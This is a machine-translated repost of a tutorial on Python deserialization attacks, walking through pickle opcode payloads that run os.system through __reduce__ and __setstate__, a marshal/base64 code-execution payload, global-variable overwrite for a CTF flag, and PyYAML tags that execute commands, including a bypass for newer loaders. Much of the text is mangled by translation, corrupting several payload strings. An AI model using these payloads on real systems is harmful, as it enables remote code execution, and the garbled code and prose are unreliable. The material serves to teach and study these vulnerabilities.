In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >
Share
Shulou(Shulou.com)06/01 Report--
This article shares with you the content of a sample analysis of Python deserialization. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.
Python deserialization vulnerability Pickle
Serialization: pickle.dumps () serializes the object into a string, and pickle.dump () stores the serialized string as a file
Deserialization: pickle.loads () deserializes strings into objects, pickle.load () reads data from files to deserialize
When using dumps () and loads (), you can use the protocol parameter to specify the protocol version
The protocol has 0 python version 1, 2, 3, 4, 5. Different versions of the protocol default to different versions of the protocol. Of these versions, the number 0 is the most readable, and later versions add unprintable characters for optimization.
The protocol is backward compatible, and version 0 can also be used directly.
Serializable object
None, True and False
Integer, floating point, plural
Str 、 byte 、 bytearray
Contains only collections of sealable objects, including tuple, list, set, and dict
The function defined at the outermost layer of the module (using def definition, but not lambda function)
The built-in function defined at the outermost layer of the module
The class defined at the outermost layer of the module
A class whose _ _ dict__ attribute value or the return value of the _ _ getstate__ () function can be serialized (see Pickling Class Instances in the official documentation for details)
Deserialization process
The underlying implementation of the pickle.load () and pickle.loads () methods is based on the _ Unpickler () method to deserialize
During deserialization, _ Unpickler (hereinafter called the machine) maintains two things: the stack area and the storage area.
To study it, you need to use a debugger pickletools
[external link image transfer failed. The origin server may have hotlink protection mechanism. It is recommended to save the image and upload it directly (img-wUDq6S9E-1642832623478) (C:\ Users\ Administrator\ AppData\ Roaming\ Typora\ typora-user-images\ image-20220121114238511.png)]
As can be seen from the figure, the serialized string is actually a string of PVM (Pickle Virtual Machine) instructions, which are stored and parsed in the form of a stack.
PVM instruction set
The complete PVM instruction set can be viewed in pickletools.py. The instruction set used by different protocol versions varies slightly.
The script in the figure above can be translated into:
0:\ x80 PROTO 3 # Protocol version 2:] EMPTY_LIST # pushes the empty list onto stack 3: (MARK # pushes the flag onto stack 4: X BINUNICODE'a'# unicode character 10: X BINUNICODE 'b' 16: X BINUNICODE 'c' 22: e APPENDS (MARK at 3) # pushes the data after Standard 3 into list 23:. STOP # pops up the data in the stack and ends with highest protocol among opcodes = 2
There are several important scripts in the instruction set:
GLOBAL = swap c'# pushes two strings ending in the exchange behavior onto the stack, the first is the module name and the second is the class name, that is, the value of the global variable xxx.xxx can be called
REDUCE = bounded R' # pushes the object generated by callable tuples and parameter tuples into the stack, that is, the first value returned by _ _ reduce () is the executable function, and the second value is the parameter, executing the function
BUILD = broomb' # builds the object through _ _ setstate__ or update _ _ dict__. If the object has a _ _ setstate__ method, anyobject.__ setstate__ (parameter) is called; if there is no _ _ setstate__ method, the value is updated through anyobject.__dict__.update (argument) (the update may produce variable overrides)
STOP = baked.'# end
A more complex example:
Import pickleimport pickletoolsclass a_class (): def _ _ init__ (self): self.age = 24 self.status = 'student' self.list = [' averse, 'baked,' c'] a_class_new = a_class () a_class_pickle = pickle.dumps (a_class_new Protocol=3) print (a_class_pickle) # optimize a packaged string a_list_pickle = pickletools.optimize (a_class_pickle) print (a_class_pickle) # disassemble a packaged string pickletools.dis (a_class_pickle) 0:\ x80 PROTO 3 2: C GLOBAL'_ main__ ajar class' 20:) EMPTY_TUPLE # will be empty Group push stack 21:\ x81 NEWOBJ # indicates that the content of the previous stack is a class (_ _ main__ a_class) Then for a tuple (tuple pushed in 20 lines), call cls.__new__ (cls, * args) (that is, create an instance with the parameters in the tuple Here the tuple is actually empty) 22:} EMPTY_DICT # push the empty dictionary onto stack 23: (MARK 24: X BINUNICODE 'age' 32: K BININT1 24 34: X BINUNICODE' status' 45: X BINUNICODE 'student' 57: X BINUNICODE' list' 66:] EMPTY_LIST 67: (MARK 68: X BINUNICODE 'a' 74: X BINUNICODE 'b' 80: X BINUNICODE 'c' 86: e APPENDS (MARK at 67) 87: U SETITEMS (MARK at 23) # will add the values passed in from line 23 as key-value pairs to the existing dictionary 88: B BUILD # update dictionary to complete construction of 89:. STOPhighest protocol among opcodes = 2 common function execution
There are three PVM instruction sets related to function execution: r, I, o, so we can construct them from three directions:
R:
B'''cossystem (Sparta who amiable t.
I:
Bachelors'(Sweewhoamiamitis iossystem.roommates'
O:
Execute the command'(cossystemS'whoami'o.'''__reduce () _)
The _ _ recude () _ magic function is automatically called at the end of the deserialization process and returns a tuple. The first element is a callable object, which is called when the initial version of the object is created, and the second element is the parameter of the callable object, which may cause RCE vulnerabilities when deserialization.
The instruction code that triggers _ _ reduce () _ is ``R _ instruction * as long as there is an R instruction in the serialized string * *, the reduce method will be executed, regardless of whether the reduce` method is specified in the normal program or not.
Pickle automatically import modules that are not introduced when deserializing, so all code execution and command execution functions in the python standard library can be used, but the python version of payload generated had better be consistent with the target.
Example:
Class a_class (): def _ reduce__ (self): return os.system, ('whoami',) # _ reduce__ () the return value of the magic method: # os.system, (' whoami',) # 1. Satisfies the return of a tuple with at least two parameters # 2. The first argument is the called function: os.system () # 3. The second parameter is a tuple: ('whoami',), and the called parameter' whoami' in the tuple is the parameter # 4 of the called function. Therefore, the code parsed during serialization is os.system ('whoami') b'\ X80\ x03cnt\ nsystem\ nq\ X00X\ X06\ X00\ X00\ x00whoamiq\ X01\ X85q\ x02Rq\ x03.roomb'\ X80\ x03cnt\ nsystem\ nX\ X06\ X00\ x00whoami\ x85R.0:\ x80 PROTO 3 2: C GLOBAL' nt system' 13: X BINUNICODE 'whoami' 24:\ X85 TUPLE1 25: r REDUCE 26:. STOPhighest protocol among opcodes = 2
When the string is deserialized, the command os.system ('whoami') is executed
Global variable coverage
_ _ reduce () _ uses the R script to create REC, while the GLOBAL = bounded c 'script can trigger global variable overrides
# secret.pya = aaaaaa# unser.pyimport secretimport pickleclass flag (): def _ _ init__ (self, a): self.a = ayour_payload = b'?'other_flag = pickle.loads (your_payload) secret_flag = flag (secret) if other_flag.a = = secret_flag.a: print ('flag: {}' .format (secret_flag.a)) else: print ('Notification')
How do you get secret.a without knowing flag?
First try to get the serialized string of flag ():
Class flag (): def _ _ init__ (self, a): self.a = anew_flag = pickle.dumps (Flag ("A") Protocol=3) flag = pickletools.optimize (new_flag) print (flag) print (pickletools.dis (new_flag)) b'\ x80\ x03c mainstay _\ nFlag\ n)\ x81} X\ X01\ X00\ x00aX\ X01\ X00\ x00Asb.0:\ x80 PROTO 3 2: C GLOBAL'_ main__ Flag' 17: Q BINPUT 0 19:) EMPTY_TUPLE 20:\ x81 Asb21 Q BINPUT 1 23:} EMPTY_DICT 24: Q BINPUT 2 26: X BINUNICODE'a'32: Q BINPUT 3 34: X BINUNICODE'A'40: Q BINPUT 4 42: s SETITEM 43: B BUILD 44:. STOPhighest protocol among opcodes = 2
As you can see, the parameter is passed on line 34, assigning the variable A to a. If you change A to the global variable secret.a, change X BINUNICODE'A'to c GLOBAL 'secret a' (X\ X01\ X00\ x00\ x00A to csecret\ na\ n). After the string is deserialized, the value of self.an is equal to that of secret.a, and flag is obtained successfully.
In addition to rewriting the PVM instruction, you can use the exec function to cause variable overrides:
Test1=' test1'test2 = 'test2'class A: def _ _ reduce (self): retutn exec, "test1='asd'\ ntest2='qwe'" uses the BUILD instruction RCE (does not use the R instruction)
Through the combination of BUILD instruction and GLOBAL instruction, existing classes can be rewritten into os.system or other functions.
Assuming that a class does not previously have a _ _ setstate__ method, we can use {'_ setstate__': os.system} to BUILE this object
When the BUILD instruction is executed, the update is executed because there is no _ _ setstate__ method, and the _ _ setstate__ method of this object is changed to the os.system we specified.
Next, if we use 'whoami' to BUILD the object again, we will execute setstate (' whoami'), and at this time _ _ setstate__ has been set to os.system, so we have implemented RCE
Example:
There is an arbitrary class in the code:
Class payload: def _ _ init__ (self): pass
Construct PVM instructions from this class:
0:\ x80 PROTO 3 2: C GLOBAL'_ main__ payload' 17: Q BINPUT 0 19:) EMPTY_TUPLE 20:\ x81 NEWOBJ 21:} EMPTY_DICT # use BUILD First put in a dictionary 22: (MARK # put a flag 23: v UNICODE'_ setstate__' # before putting the value to 37: C GLOBAL'nt system' 48: U SETITEMS (MARK at 22) 49: b BUILD # first BUILD 50: v UNICODE 'whoami' # plus parameter 58: B BUILD # second BUILD 59:. STOP
Rewrite the above PVM instruction into bytes form: B'\ x80\ x03cordered maintainable _\ npayload\ n)\ x81} (Vroomsetstatedirected _\ ncnt\ nsystem\ nubVwhoami\ nb.', successfully executes the command after deserialization using piclke.loads ()
Using Marshal module to cause arbitrary function execution
Pickle cannot serialize code objects, but python provides a module Marshal that can serialize code objects
But serialized code objects can no longer use _ _ reduce () _ calls, because _ _ reduce__ is executed by calling a callable object and passing parameters, and our function itself is a callable object, and we need to execute it instead of taking it as an argument to a function. Hiding requires the use of typres modules to dynamically create anonymous functions.
Import marshalimport typesdef code (): import os print ('hello') os.system (' whoami') code_pickle = base64.b64encode (marshal.dumps (code.__code__)) # python2 is code.func_codetypes.FunctionType (marshal.loads (base64.b64decode (code_pickle)), globals (),') () # dynamically create anonymous functions using types and execute them
Use on pickle:
Import pickle# rewrites types.FunctionType (marshal.loads (base64.b64decode (code_pickle)), globals (),'') () into the form PVM s = b "ctypesFunctionType (cmarshalloads (cbase64b64decode (S'4wAAAAAAAAAAAAAAAAEAAAADAAAAQwAAAHMeAAAAZAFkAGwAfQB0AWQCgwEBAHwAoAJkA6EBAQBkAFMAKQRO6QAAAADaBWhlbGxv2gZ3aG9hbWkpA9oCb3PaBXByaW502gZzeXN0ZW0pAXIEAAAAqQByBwAAAPogRDovUHl0aG9uL1Byb2plY3QvdW5zZXJpYWxpemUucHnaBGNvZGUlAAAAcwYAAAAAAQgBCAE='tRtRc__builtin__globals (tR." pickle.loads (s) # string converted to bytes vulnerability location)
When resolving authentication token and session
Store the object in a disk file after pickle
Transfer the object in the network after pickle
Parameters are passed to the program
PyYAML
Yaml is a markup language, similar to xml and json, each language that supports yaml format will have its own implementation to parse (read and save) the yaml format. PyYAML is the python implementation of yaml.
When using the PyYAML library, if you use yaml.load () instead of yaml.safe_load () function to parse yaml files, it will lead to deserialization vulnerabilities.
Principle
PyYAML has a list of handling functions for tag parsing specific to the python language, three of which are object-related:
!! python/object: = > Constructor.Constructor.construct
For example:
# Test.pyimport yamlimport osclass test: def _ _ init__ (self): os.system ('whoami') payload = yaml.dump (test ()) fp = open (' sample.yml', 'w') fp.write (payload) fp.close ()
After the code is executed, a sample.yml is generated and written to!! python/object:__main__.test {}
Change the contents of the file to!! python/object:Test.test {} and then use yaml.load () to parse the yaml file:
Import yamlyaml.load (file ('sample.yml', 'w'))
The command was executed successfully. However, the execution of the command depends on the existence of Test.py, because yaml.load () reads the test object (class) in Test.py according to the instructions in the yml file. If you delete Test.py, it will also fail to run.
PayloadPyYAML
< 5.1 想要消除依赖执行命令,就需要将其中的类或者函数换成 python 标准库中的类或函数,并使用另外两种 python 标签: # 该标签可以在 PyYAML 解析再入 YAML 数据时,动态的创建 Python 对象!!python/object/apply: =>Constructor.construct_python_object_apply# this tag calls applyroompythonandobject Constructor.construct_python_object_apply#: = > Constructor.construct_python_object_new
With these two tags, you can construct any payload:
! python/object/apply:subprocess.check_output [[calc.exe]]!! python/object/apply:subprocess.check_output ["calc.exe"]!! python/object/apply:subprocess.check_output [["calc.exe"]]!! python/object/apply:os.system ["calc.exe"]!! python/object/new:subprocess.check_output [["calc.exe"]]!! python/object/new:os.system ["calc.exe"] PyYAML > = 5.1
After version PyYAML > = 5.1, the deserialization of built-in class methods and the import and use of non-existent deserialization code are restricted, and the loader parameter is required when using the load () method, which will give a security warning when used directly.
There are four types of loader:
BaseLoader: load only the most basic YAML
SafeLoader: safely loads a subset of the YAML language, recommended for untrusted input (safe_load)
FullLoader: load the complete Yaml language to avoid arbitrary code execution, which is the current (PyYAML 5.1) default loader calls yaml.load (input) (after warning) (full_load)
UnsafeLoader (also known as Loader backward compatibility): raw Loader code that can be easily exploited through untrusted data entry (unsafe_load)
Prior to the higher version, payload has expired, but you can use the subporcess.getoutput () method to bypass detection:
!! python/object/apply:subprocess.getoutput- whoami
On the latest version, the command was executed successfully
Ruamel.yaml
The usage of ruamel.yaml is basically the same as that of PyYAML, and newer YAML1.2 versions are supported by default.
To deserialize a serialization class method with parameters in ruamel.yaml, there are the following methods:
Load (data)
Load (data, Loader=Loader)
Load (data, Loader=UnsafeLoader)
Load (data, Loader=FullLoader)
Load_all (data)
Load_all (data, Loader=Loader)
Load_all (data, Loader=UnSafeLoader)
Load_all (data, Loader=FullLoader)
We can use any of the above methods, and even we can call load () directly by providing data for deserialization, which will deserialize it perfectly, and our class methods will be executed.
Thank you for reading! This is the end of this article on "sample analysis of Python deserialization". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, you can share it for more people to see!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.